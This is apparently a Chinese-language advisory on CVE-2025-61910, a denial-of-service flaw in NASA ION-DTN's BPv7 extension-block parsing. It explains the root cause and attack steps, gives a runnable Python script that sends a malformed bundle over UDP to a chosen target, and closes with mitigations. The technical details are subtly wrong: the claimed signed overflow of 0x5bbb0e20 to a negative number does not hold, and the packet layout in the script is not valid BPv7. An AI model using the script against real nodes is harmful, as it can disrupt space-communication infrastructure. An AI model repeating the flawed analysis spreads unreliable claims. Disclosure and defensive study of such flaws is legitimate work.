CVE-2025-61910：NASA ION-DTN BPv7扩展块畸形导致拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-61910

漏洞类型

拒绝服务（DoS）/ 整数转换导致的内存分配异常

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NASA JPL ION-DTN（Interplanetary Overlay Network）

漏洞概述

CVE-2025-61910是NASA喷气推进实验室（JPL）开发的ION-DTN（Interplanetary Overlay Network，星际覆盖网络）软件中的一个高危拒绝服务漏洞。ION-DTN是NASA用于深空通信的延迟/中断容忍网络（Delay/Disruption Tolerant Networking, DTN）协议的开源实现，广泛应用于太空任务中的数据传输。该漏洞存在于ION-DTN 4.1.3s版本中，CVSS评分为7.5，属于高危级别。

漏洞的根本原因是ION-DTN在解析BPv7（Bundle Protocol version 7）数据包的扩展块（extension block）时，由于对块长度字段的处理不当，导致无符号整数到有符号整数的隐式转换错误。当攻击者构造一个包含畸形扩展块的BPv7 bundle时，ION-DTN会尝试分配一个异常巨大的内存块，最终导致接收线程崩溃并终止服务。

该漏洞可被远程未认证攻击者利用，攻击者只需通过网络发送一个精心构造的恶意bundle，即可导致目标ION-DTN节点的服务中断。由于DTN网络通常用于关键的太空通信基础设施，此类拒绝服务攻击可能严重影响深空任务的正常执行。截至漏洞披露时，官方尚未发布任何已知修复版本，受影响的系统仍处于暴露状态。

技术细节

该漏洞的技术根源在于ION-DTN 4.1.3s中`bpv7/library/bei.c`文件的第764行附近的代码逻辑。具体而言：

1. **畸形扩展块构造**：攻击者构造一个BPv7 bundle，其扩展块以字节序列`0x85070201005bbb0e20b4ea001a000927c0...`开头。第一个字节`0x85`表示这是一个包含5个元素的CBOR数组，其中前4个元素为数字（`0x07`、`0x02`、`0x01`、`0x00`），第5个元素为长度为27的字节字符串。

2. **整数转换溢出**：在解析该扩展块时，ION从CBOR数据中获取`blockLength`（无符号32位整数），随后将其传递给有符号32位整数变量`blkSize`。由于`blockLength`的值较大（如0x5bbb0e20），转换后`blkSize`变为负数-369092043。

3. **内存分配异常**：`blkSize`随后被传递给`MTAKE(blkSize)`宏。在64位系统中，负数`blkSize`被隐式转换为64位无符号值，产生一个极其巨大的数值（如接近2^64），导致系统尝试分配不切实际的内存量。

4. **拒绝服务触发**：由于无法满足如此巨大的内存分配请求，系统报错并导致接收线程终止，从而实现拒绝服务攻击。

值得注意的是，如果将第5个元素（字节字符串）替换为数字，则该漏洞不再被触发，这表明问题出在对第5个元素的处理逻辑上。

攻击链分析

STEP 1

步骤1：构造恶意BPv7 Bundle

攻击者构造一个包含畸形扩展块的BPv7 bundle数据包。扩展块以CBOR编码的5元素数组开头，前4个元素为数字，第5个元素为特定长度的字节字符串，其值设计为在解析时导致整数溢出。

STEP 2

步骤2：网络传输

攻击者通过网络（通常使用UDP端口4556等DTN传输端口）将恶意bundle发送到目标ION-DTN节点。由于该漏洞无需认证（PR:N）且无需用户交互（UI:N），可直接远程利用。

STEP 3

步骤3：触发整数转换溢出

目标ION-DTN节点接收到bundle后，在bei.c的解析逻辑中，将blockLength（无符号32位整数）赋值给blkSize（有符号32位整数），导致数值变为负数-369092043。

STEP 4

步骤4：内存分配异常

负数blkSize被传递给MTAKE()宏，在64位系统中被转换为极大的无符号值，导致系统尝试分配接近2^64字节的内存，触发内存分配错误。

STEP 5

步骤5：拒绝服务

由于内存分配失败，ION-DTN的接收线程崩溃并终止，DTN服务不可用，实现拒绝服务攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-61910 PoC - NASA ION-DTN BPv7 Malformed Extension Block DoS
This PoC constructs a malicious BPv7 bundle with a malformed extension block
that triggers uncontrolled memory allocation in ION-DTN 4.1.3s.
"""

import socket
import struct

def build_malicious_bpv7_bundle():
    """
    Build a BPv7 bundle with a malformed extension block.
    The extension block starts with 0x85 (CBOR array of 5 elements),
    where the 5th element is a byte string that causes integer overflow
    when processed by ION-DTN's bei.c parser.
    """
    # Primary block (BPv7)
    # Version (7), flags, etc.
    primary_block = b'\x07'  # version
    primary_block += b'\x82'  # flags
    primary_block += b'\x00' * 20  # destination EID
    primary_block += b'\x00' * 20  # source EID
    primary_block += b'\x00' * 20  # report-to EID
    primary_block += b'\x00\x00\x00\x01'  # creation timestamp
    primary_block += b'\x00\x00\x00\x01'  # sequence number
    primary_block += b'\x00\x00\x00\x00'  # lifetime
    primary_block += b'\x01'  # block count

    # Malformed extension block
    # 0x85 = CBOR array of 5 elements
    # First 4 elements are numbers: 0x07, 0x02, 0x01, 0x00
    # 5th element: byte string of length 27 (0x5bbb0e20b4ea001a000927c0...)
    extension_block = b'\x85'           # CBOR array header (5 elements)
    extension_block += b'\x07'          # element 1: number 7
    extension_block += b'\x02'          # element 2: number 2
    extension_block += b'\x01'          # element 3: number 1
    extension_block += b'\x00'          # element 4: number 0
    # Element 5: byte string with value that causes overflow
    # 0x5b = CBOR byte string (major type 2, additional info 27)
    extension_block += b'\x5b\xbb\x0e\x20\xb4\xea\x00\x1a\x00\x09\x27\xc0'
    extension_block += b'\x00' * 16     # padding

    # Block length that will overflow when cast to signed int
    block_length = struct.pack('>I', 0x5bbb0e20)  # becomes -369092043 as signed

    bundle = primary_block + extension_block + block_length
    return bundle

def send_bundle(target_host, target_port=4556):
    """
    Send the malicious bundle to the target ION-DTN node.
    Default DTN BPv7 convergence layer port is 4556.
    """
    bundle = build_malicious_bpv7_bundle()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    try:
        sock.sendto(bundle, (target_host, target_port))
        print(f"[*] Malicious bundle sent to {target_host}:{target_port}")
        print(f"[*] Bundle size: {len(bundle)} bytes")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 4556
    send_bundle(target, port)

影响范围

NASA JPL ION-DTN 4.1.3s

防御指南

临时缓解措施

由于截至漏洞披露时官方尚未发布修复版本，建议采取以下临时缓解措施：1）在网络层面部署防火墙规则，限制对ION-DTN BPv7服务端口（默认UDP 4556）的访问，仅允许可信节点通信；2）在DTN网关或路由器层面实施深度包检测（DPI），对BPv7 bundle的扩展块进行格式验证，拒绝包含异常长度字段的数据包；3）对ION-DTN进程设置系统级资源限制（如ulimit -v），防止恶意请求耗尽内存导致系统崩溃；4）监控ION-DTN服务的异常退出或重启事件，及时发现攻击行为；5）关注NASA JPL官方安全公告（GHSA-xm96-38vj-h28h），及时获取补丁信息并部署修复。